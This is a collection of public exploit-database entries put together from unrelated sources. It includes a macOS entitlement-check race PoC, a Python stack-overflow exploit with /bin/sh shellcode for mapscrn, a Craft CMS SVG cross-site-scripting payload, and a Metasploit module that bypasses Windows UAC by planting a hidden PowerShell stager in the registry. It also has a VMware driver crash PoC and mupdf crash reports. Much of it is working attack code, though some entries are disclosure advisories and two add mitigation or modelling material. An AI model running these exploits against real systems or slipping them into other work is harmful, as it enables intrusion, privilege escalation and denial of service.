/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223
One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains, amongst other things, the sender's uid, gid, ruid, guid, pid and pid generation number (p_idversion).
The canonical way in which userspace daemons check a message sender's entitlements is as follows:
audit_token_t tok;
xpc_connection_get_audit_token(conn, &tok);
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
CFErrorRef err;
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
{
SecTaskRef task;
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
...
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
This pid now maps to the entitlements of that new binary.
b) If the process can't exec a binary (it's in a sandbox, for example) then exploitation is still possible if the process has the ability to
crash and force the restart of a binary with that entitlement (a common case, e.g. via an OOM or NULL pointer deref in a mach service).
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
have its pid reused by the respawned entitled process.
Scenario b) is not so outlandish; such a setup could be achieved via a renderer bug with the ability to gain code execution in new renderer processes
as they are created.
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.
This may also open up access to privileged information which is protected by the entitlements.
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
Use an lldb invocation like:
sudo lldb -w -n corecaptured
then run this PoC and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
You'll notice that the check passes and our xpc message has been received and will now be processed by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
PoC tested on MacOS 10.12.3 (16D32)
*/
// ianbeer
#if 0
MacOS/iOS userspace entitlement checking is racy
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <mach/mach.h>
#include <xpc/xpc.h>

// exec the target binary with a full pipe as its stdout/stderr so that it blocks on its
// first write and keeps running (and keeps our pid) instead of printing usage and exiting
void exec_blocking(char* target, char** argv, char** envp) {
  // create the pipe
  int pipefds[2];
  pipe(pipefds);
  int read_end = pipefds[0];
  int write_end = pipefds[1];
  (void)read_end; // deliberately left open so the writer never sees a closed pipe

  // make the pipe nonblocking so we can fill it
  int flags = fcntl(write_end, F_GETFL);
  flags |= O_NONBLOCK;
  fcntl(write_end, F_SETFL, flags);

  // fill up the write end
  int ret, count = 0;
  do {
    char ch = ' ';
    ret = write(write_end, &ch, 1);
    count++;
  } while (!(ret == -1 && errno == EAGAIN));
  printf("wrote %d bytes to pipe buffer\n", count-1);

  // make it blocking again
  flags = fcntl(write_end, F_GETFL);
  flags &= ~O_NONBLOCK;
  fcntl(write_end, F_SETFL, flags);

  // set the pipe write end to stdout/stderr
  dup2(write_end, 1);
  dup2(write_end, 2);

  execve(target, argv, envp);
}

xpc_connection_t connect(char* service_name){
  xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);
  return conn;
}

int main(int argc, char** argv, char** envp) {
  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");

  xpc_connection_t conn = connect("com.apple.corecaptured");
  xpc_connection_send_message(conn, msg);

  // exec a binary with the entitlement to talk to that daemon
  // make sure it doesn't exit by giving it a full pipe for stdout/stderr
  char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
  char* target_argv[] = {target_binary, NULL};
  exec_blocking(target_binary, target_argv, envp);

  return 0;
}
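The pid-reuse race of scenario b) above, as an added stand-alone model that is not the report's code and uses no macOS API: a tiny wrapping pid allocator, a check keyed on the pid alone (as the report says SecTaskCreateWithAuditToken was) next to one that also compares the token's generation number, and a replay of the crash-and-respawn sequence. All names (model_*, entitled_by_*, play_pid_reuse_race) are constructed for the example; exec (scenario a) is not modelled.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the two audit-token fields the report discusses. */
typedef struct {
    int32_t pid;
    int32_t pidversion;   /* p_idversion: every new process gets a fresh value */
} model_token_t;

typedef struct {
    bool    live;
    int32_t pidversion;
    bool    entitled;     /* does the image in this pid slot carry the entitlement? */
} model_proc_t;

#define MODEL_MAX_PID 4   /* tiny pid space so the wrap-around takes only a few respawns */

static model_proc_t g_procs[MODEL_MAX_PID];
static int32_t g_next_pid = 0;
static int32_t g_next_pidversion = 1;

static void model_reset(void)
{
    memset(g_procs, 0, sizeof g_procs);
    g_next_pid = 0;
    g_next_pidversion = 1;
}

/* Allocate the next free pid, walking forward and wrapping as a real allocator does. */
static int32_t model_spawn(bool entitled)
{
    for (int i = 0; i < MODEL_MAX_PID; i++) {
        int32_t pid = (g_next_pid + i) % MODEL_MAX_PID;
        if (!g_procs[pid].live) {
            g_procs[pid].live = true;
            g_procs[pid].entitled = entitled;
            g_procs[pid].pidversion = g_next_pidversion++;
            g_next_pid = (pid + 1) % MODEL_MAX_PID;
            return pid;
        }
    }
    return -1; /* pid space exhausted */
}

static void model_exit(int32_t pid) { g_procs[pid].live = false; }

/* The token the kernel stamps on a message at the moment `pid` sends it. */
static model_token_t model_token_for(int32_t pid)
{
    model_token_t t = { pid, g_procs[pid].pidversion };
    return t;
}

/* Check keyed on the pid alone: whatever now occupies that pid decides the answer. */
bool entitled_by_pid(model_token_t t)
{
    return g_procs[t.pid].live && g_procs[t.pid].entitled;
}

/* Check that also insists the generation in the token matches the process now holding the pid. */
bool entitled_by_pid_and_version(model_token_t t)
{
    const model_proc_t *p = &g_procs[t.pid];
    return p->live && p->pidversion == t.pidversion && p->entitled;
}

typedef struct {
    int  respawns;         /* entitled-process restarts needed to line the allocator up */
    bool by_pid;           /* verdict of the pid-only check on the stale token */
    bool by_version;       /* verdict of the pid+generation check on the stale token */
    bool fresh_by_version; /* sanity: the respawned entitled process itself still passes */
} race_result_t;

/* Scenario b): the unentitled sender queues a message, keeps crashing the entitled process
 * until the next free pid is its own, then crashes itself so the respawn lands on its pid
 * before the daemon evaluates the queued message's token. */
race_result_t play_pid_reuse_race(void)
{
    race_result_t r = {0};
    model_reset();
    (void)model_spawn(true);                    /* the target daemon */
    int32_t entitled = model_spawn(true);       /* the entitled client the daemon expects */
    int32_t attacker = model_spawn(false);      /* sandboxed sender, no entitlement */

    while (g_next_pid != attacker) {            /* spin the allocator round to the attacker's pid */
        model_exit(entitled);
        entitled = model_spawn(true);
        r.respawns++;
    }

    model_token_t stale = model_token_for(attacker);  /* sent now, checked later */
    model_exit(entitled);
    model_exit(attacker);
    int32_t respawned = model_spawn(true);      /* takes over the attacker's pid */

    r.by_pid = entitled_by_pid(stale);
    r.by_version = entitled_by_pid_and_version(stale);
    r.fresh_by_version = (respawned == attacker) &&
                         entitled_by_pid_and_version(model_token_for(respawned));
    return r;
}
```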
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: Mapscrn ( Part of setfont ) 2.0.3
# The mapscrn command loads a user defined output character mapping table into the console driver.
# The console driver may be later put into use user-defined mapping table mode by outputting a special
# escape sequence to the console device.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Architecture: all
#
# Vendor homepage: http://ccross.msk.su
#
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
# by 0x10933B: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
#
# Invalid read of size 2
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
#
# Process terminating with default action of signal 11 (SIGSEGV)
# Access not within mapped region at address 0x41414141
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
import errno
import subprocess

junk = b"\x41" * 4880  # junk to reach the saved return address
nops = b"\x90" * 24  # NOP sled
shellcode = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
esp = b"\xe0\xdf\xff\xbf"  # Must be changed to the stack address of the target
buffer = junk + esp + nops + shellcode  # Craft the buffer (bytes, so the raw values reach argv unchanged)
try:
    print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
    print("[*] Please wait.. running")
    subprocess.call(["mapscrn", buffer])
except OSError as e:
    if e.errno == errno.ENOENT:
        print("Mapscrn not found!")
    else:
        print("Error executing exploit")
        raise
# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
# Date: 2017-06-08
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://craftcms.com
# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
# Version: 2.6
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT
Release Date:
=============
2017-06-08
Product & Service Introduction:
===============================
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent security researcher, discovered a persistent cross-site scripting vulnerability through unrestricted file upload of an SVG file in Craft CMS (v2.6).
Vulnerability Disclosure Timeline:
==================================
2017-06-08: Found the vulnerability.
2017-06-08: Reported to vendor.
2017-06-08: Published.
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
The security risk of the XSS vulnerability is estimated as medium, with a Common Vulnerability Scoring System count of 3.6.
Exploitation of the persistent XSS web vulnerability requires a limited editor user account with low privileges (only editing news) and only low user interaction.
If the attacker uploads a file type that can be used for XSS (HTML, SWF, PHP etc.), it is not accepted as an image. Images, however, are stored unchanged, so an SVG uploaded with JavaScript content is accepted and its script executes.
The "Content-Type: image/svg+xml; charset=us-ascii" header with which the file is later served is what makes this XSS attack work.
Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirects to malicious sources and persistent manipulation of affected or connected web module context.
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by a low privileged user/editor whose only privilege is editing news. After successful exploitation, this attack can be used by the editor to hijack the admin account!
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.
Payload (Exploitation):
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
[+] Manual steps to reproduce ..
1. Login with the editor account (only privilege to edit news) in Craft CMS
2. Go to 'add news' option: https://localhost/admin/entries/news/new
3. Put random values in title
4. On your attacker machine, create a file named 'xss.svg' (without quotes) containing the payload shown above
5. Upload the xss.svg file in the featured image option in Craft CMS
6. Click on Save
7. Now go to: https://localhost/s/assets/site/xss.svg
8. XSS payload execution occurs and an alert pops up with the domain name
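A server-side mitigation for the issue above, added here as an example and not part of the advisory: it assumes the uploaded assets under the /s/assets/ path from the reproduction steps are served by nginx. Forcing a download and applying a sandboxing CSP means an SVG that still carries a script is never executed in the site's origin when opened directly, while `<img>` references (which never run SVG script) keep working.

```nginx
# Constructed example: user-uploaded assets live under /s/assets/ (the path in the steps above).
location /s/assets/ {
    # Direct navigation downloads the file instead of rendering it as a document,
    # so an embedded <script> is never executed in this origin.
    add_header Content-Disposition "attachment" always;
    # Belt and braces for anything still rendered inline: no script, no same-origin access.
    add_header Content-Security-Policy "sandbox; default-src 'none'; img-src 'self'; style-src 'unsafe-inline'" always;
    # Stop browsers from re-interpreting the upload as a different type.
    add_header X-Content-Type-Options "nosniff" always;
}
```

Rejecting `<script>` elements and event-handler attributes at upload time is the complementary control; the headers above limit the damage when a validator is bypassed.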
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
# Exploit Title: Unquoted Service Path Privilege Escalation - Net Monitor for Employees Pro <= 5.3.4
# Date: 18/03/2017
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://networklookout.com/
# Version: <= 5.3.4
# CVE: CVE-2017-7180
# Vendor not responding. Contacted vendor 18/3/2017
Net Monitor for Employees is an agent-based application for monitoring users' machines. Its agent installs itself as a service ("Net Monitor for Employees Agent") with an unquoted service path, running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
C:\Users\Win7>sc qc "Net Monitor for Employees Agent"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Net Monitor for Employees Agent
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Net Monitor for Employees Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
A successful attempt requires the local attacker to insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) BYTECOD3R
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas

  FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
  FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
  EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
  EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
  FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
  CMD_MAX_LEN = 16383

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
        'Description' => %q{
          This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
          the current user hive, and inserting a custom command that will get invoked when
          the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
          flag turned off.

          This module modifies a registry key, but cleans up the key once the payload has
          been invoked.

          The module does not require the architecture of the payload to match the OS. If
          specifying EXE::Custom your DLL should call ExitProcess() after starting your
          payload in a separate process.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'winscriptingblog', # UAC bypass discovery and research
          'amaloteaux', # MSF module
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' => [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
        'DefaultTarget' => 0,
        'References' => [
          ['URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/'],
          ['URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1']
        ],
        'DisclosureDate' => 'May 12 2017'
      )
    )
  end

  def check
    if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    commspec = '%COMSPEC%'
    registry_view = REGISTRY_VIEW_NATIVE
    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"

    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] == ARCH_X64
      if session.arch == ARCH_X86
        # fodhelper.exe is an x64-only exe
        commspec = '%WINDIR%\\Sysnative\\cmd.exe'
        if target_arch.first == ARCH_X64
          # We can't use an absolute path here as
          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from an x86 session
          psh_path = "powershell.exe"
        end
      end
      if target_arch.first == ARCH_X86
        # Invoking x86, so switch to SysWOW64
        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
      end
    else
      # if we're on x86, we can't handle x64 payloads
      if target_arch.first == ARCH_X64
        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
      end
    end

    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
         UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
         UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
      fail_with(Failure::NotVulnerable,
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
    when UAC_DEFAULT
      print_good('UAC is set to Default')
      print_good('BypassUAC can bypass this setting, continuing...')
    when UAC_NO_PROMPT
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
      shell_execute_exe
      return
    end

    payload_value = rand_text_alpha(8)
    psh_path = expand_path(psh_path)
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
    if psh_payload.length > CMD_MAX_LEN
      fail_with(Failure::None, "Payload size should be smaller than #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
    end
    psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"

    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
    exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?

    if existing.empty?
      registry_createkey(FODHELPER_WRITE_KEY, registry_view)
    end

    print_status("Configuring payload and stager registry keys ...")
    unless exist_delegate
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)

    # Calling fodhelper.exe through cmd.exe allows us to launch it from either x86 or x64 session arch.
    cmd_path = expand_path(commspec)
    cmd_args = expand_path("/c #{FODHELPER_PATH}")
    print_status("Executing payload: #{cmd_path} #{cmd_args}")

    # We can't use cmd_exec here because it blocks, waiting for a result.
    client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })

    # Wait a couple of seconds to give the payload a chance to fire before cleaning up
    # TODO: fix this up to use something smarter than a timeout?
    Rex::sleep(5)
    handler(client)

    print_status("Cleaning up registry keys ...")
    unless exist_delegate
      registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
    end
    if existing.empty?
      registry_deletekey(FODHELPER_DEL_KEY, registry_view)
    else
      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
    end
    registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
/*
 * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
 * CVE: 2017-4916 (VMSA-2017-0009)
 * Author: Borja Merino (@BorjaMerino)
 * Date: May 18, 2017
 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
 * Affected: VMware Workstation Pro/Player 12.x
 * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
 * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
 */
#include <windows.h>
#include <stdio.h>

void ioctl_crash()
{
    HANDLE hfile;
    WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
    DWORD dummy;
    char reply[0x3FDC];

    hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hfile == INVALID_HANDLE_VALUE) {
        printf("CreateFileW failed: %lu (is vixDiskMountServer.exe running?)\n", GetLastError());
        return;
    }

    // IOCTL 0x2a002c with this input buffer makes the driver complete the same IRP twice
    char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
    DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
    CloseHandle(hfile);
}

void run_vix()
{
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;

    RtlZeroMemory(&si, sizeof(si));
    RtlZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si);
    si.dwFlags |= STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    // vixDiskMountServer.exe creates the vstor2-mntapi20-shared device; start it hidden
    CreateProcessW(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}

int main(void)
{
    run_vix(); // Comment this out if vixDiskMountServer.exe is already running
    ioctl_crash();
    return 0;
}
Source: http://seclists.org/oss-sec/2017/q1/458
Description:
Mujstest, which is part of mupdf, is a scriptable tester for mupdf + js.
A crafted image, posted earlier for another issue, causes a stack overflow.
The complete ASan output:
# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
#0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
#1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:358:7
#2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
#3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in frame
#0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-source/platform/x11/jstest_main.c:293
This frame has 7 object(s):
[32, 1056) 'path'
[1184, 2208) 'text' <== Memory access at offset 1056 partially underflows this variable
[2336, 2340) 'w' <== Memory access at offset 1056 partially underflows this variable
[2352, 2356) 'h' <== Memory access at offset 1056 partially underflows this variable
[2368, 2372) 'x' <== Memory access at offset 1056 partially underflows this variable
[2384, 2388) 'y' <== Memory access at offset 1056 partially underflows this variable
[2400, 2404) 'b'
0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32127==ABORTING
Affected version:
1.10a
Fixed version:
N/A
Commit fix:
N/A
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-6060
Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org
Note:
This bug was found with Address Sanitizer.
Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
POC to trigger null pointer dereference (mutool)
After some fuzz testing I found a crashing test case.
Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
ASAN:
==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
#0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
#1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
#2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
#3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
#4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
#5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
#6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
#7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
#8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
#9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
#10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
#11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
#12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
